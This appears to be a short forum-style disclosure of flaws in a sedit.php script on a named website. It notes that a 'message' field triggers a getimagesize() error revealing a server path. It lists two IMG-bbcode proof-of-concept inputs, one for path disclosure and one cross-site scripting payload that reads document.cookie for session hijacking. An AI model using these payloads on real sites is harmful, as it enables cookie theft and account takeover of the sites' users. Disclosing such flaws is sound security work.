vulnerable script "http://www.antionline.com/sedit.php"
variable "message"
error :
Warning: getimagesize(): Read error! in /data/****/***/sedit.php on line 104
the error page could be used for hijacking because the passed data which causes the error is used in the error page.
XSS : post method.
code:
Code:
[IMG bbcode]/.././.[/IMGbbcode] path dis.
[IMGbbcode]<script>alert(document.cookie)</script>[/IMGbbcode] hija.